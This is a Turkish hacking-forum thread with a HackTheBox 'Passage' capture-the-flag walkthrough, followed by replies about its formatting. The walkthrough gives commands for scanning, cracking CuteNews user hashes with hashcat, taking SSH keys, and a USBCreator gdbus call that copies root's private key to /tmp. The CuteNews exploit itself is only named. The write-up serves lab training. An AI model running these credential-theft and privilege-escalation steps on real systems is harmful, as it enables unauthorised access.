• Yeni mesajlar

Menü

Giriş yap

---

Navigasyon

Uygulamayı yükle

Yükle

Daha fazla seçenek

Gündüz modu

Bize ulaşın

Kapat Menü

• TurkHackTeam Under Ground
• Capture The Flag

Çok eski bir web tarayıcısı kullanıyorsunuz. Bu veya diğer siteleri görüntülemekte sorunlar yaşayabilirsiniz..
Tarayıcınızı güncellemeli veya alternatif bir tarayıcı kullanmalısınız.

Hackthebox - Passage Walkthrough

• Konbuyu başlatan cybersoz
• Başlangıç tarihi 18 Ocak 2021

C

cybersoz

Yeni üye

1 Ağu 2019

19

1

• 18 Ocak 2021

• #1

Makine Adı: Passage
Zorluk: Orta
OS: Linux


Öncelikle hackthebox'ın bize verdigi ipyi

Kod:

sudo nano /etc/hosts

ardından iplerin tanımlandığı kısıma

Kod:

10.10.10.206 passage.htb

yapıştırıyoruz.

hızlıca nmap taraması yaparak açık portları öğreniyoruz

Kod:

sudo nmap -vv -A passage.htb

http ve ssh portları açık tarayacıya passage.htb yazarak sayfaya ulaşalım

en alt kısımda "Powered by CuteNews" yazısından yola çıkarak internette bilgi toplamak için "CuteNews" aramasını yapıyoruz


CuteNews'in login urlin http://passage.htb/CuteNews şeklinde olduğunu tespit ediyoruz.
bu dizine gittiğimizde en alt kısımdan CuteNews versiyonunu da öğreniyoruz

Register diyip hemen kayıt oluyoruz.Kayır olduktan sonra bizi şu şekilde bir sayfa karşılıyor=

​

Personal Options diyerek profil ayarlarına giriyoruz.

Kod:

searchsploit cutenews

yazarak exploit araması yapıyoruz



ardından

Kod:

msfconsole

ile ****sploiti çalıştırarak bu exploitin var olup olmadığına bakıyoruz.

az önceki fotoğrafta gösterdiğim yerdeki profil fotoğrafı değiştirme bölümünde uzaktan erişim için kapı açabileceğimiz bir exploit bulduk. Gerekli ayarları yaptıktan sonra exploiti çalıştırıyoruz.

içeriye erişim sağladık fakat herhangi bir user değiliz.
kullanıcıları görüntüleybilmek icin

Kod:

cd /home

yazarak var olan kullanıcıları görüntülüyoruz


1.Nadav
2.Paul


içerde dizinleri araştırırken sitenin atl dizinlerinde ilginç bir şey ile karşılaşıyoruz


dizin=

Kod:

/var/www/html/CuteNews/cdata/users

burada farklı hashlerin bulunduğunu görüyoruz. buradaki hashleri hashcat aracı ve rackyou worlistini kullanarak

Kod:

hashcat -m 1400 <hash.txt dizini> -w rockyou.txt

kodu ile kırıyoruz



paul:atl*******
(hackthebox paylaşmayı yasakladığı için yıldızlamak zorundayım)


ardından

Kod:

su paul

komutu ile paul userina geçiş yapıyoruz.


artık içerde var olan user.txt dosyasını okuyabilir ve hackthebox a yollayabiliriz.
ardından daha güzel bir terminal için ~/.ssh dizinindeki id_rsa yı indirerek ssh portu üzerinden giriş yapıyoruz.

Kod:

ssh -i id_rsa [email protected]

erişim sağladıktan sonra çalışmakta olan işlemleri görüntüleyebilmek için

Kod:

ps aux

yazıyoruz ve root üzerinde çalışan işlemleri inceliyoruz.
root üzerinde birden fazla gdbus hizmetinin çalıştığını görüyoruz.


Tekrar bir internet araştırmasından sonra daha önce yapılmış olan işlemlerin bir açık sayesinde /tmp de görebilir hale geliyoruz

Kod:

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/pwn true

ardından

Kod:

cd /tmp

ile tmp klasörüne girip oluşturduğumuz pwn dosyasını okuyabiliriz.

Kod:

cat pwn

burada bulunan id_rsa ı indirip root olarak giriş yapıyoruz

root.txt dosyasını okuyup hacktheboxa gönderiyoruz



Not = bu yazdığım ilk writeup dı bu yüzden bir hatam olduysa kusuruma bakmayın.


Herkese iyi çalışmalar
​

 

x4807

Katılımcı Üye

10 Ağu 2019

985

17

• 18 Ocak 2021

• #2

Konu içerik bakımından güzel ancak görünüş biraz yetersiz kalmış ki bu da ilgiyi azaltıyor. Yazı boyut ve renkleri özelleştirilebilir. Örnek olarak yazılar 4 başlıklarn ise 5 olabilir boyutu. Veya yazı beyaz başlık kırmızı olabilir. İstersen font falan da eklersin...

 

C

cybersoz

Yeni üye

1 Ağu 2019

19

1

• 18 Ocak 2021

• #3

x4807' Alıntı:

Konu içerik bakımından güzel ancak görünüş biraz yetersiz kalmış ki bu da ilgiyi azaltıyor. Yazı boyut ve renkleri özelleştirilebilir. Örnek olarak yazılar 4 başlıklarn ise 5 olabilir boyutu. Veya yazı beyaz başlık kırmızı olabilir. İstersen font falan da eklersin...

Genişletmek için tıkla ...

bir dahakine sefere daha dikkatli olacağım geri dönüşün için teşekkür ederim.

 

R

Rozz

Uzman üye

19 Ağu 2019

1,386

47

• 18 Ocak 2021

• #4

Güzel konu, sadece bi tık görünüm açısından eksik kalmış. Forumda hala bu bölümü boş bırakmayan birini bulmak ne güzel eline sağlık

 

MrSytem

Katılımcı Üye

30 Ağu 2019

591

4

• 18 Ocak 2021

• #5

Bir dahaki sefere değiştirmene gerek yok sağ alttaki konu düzenle butonundan renkleri ve yazı tipini güncelleyebilirsin.

İyi Forumlar

 

Cevap yazmak için giriş yap yada kayıt ol.

Paylaş:

Facebook Twitter Telegram Reddit E-posta Paylaş Link

• TurkHackTeam Under Ground
• Capture The Flag

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.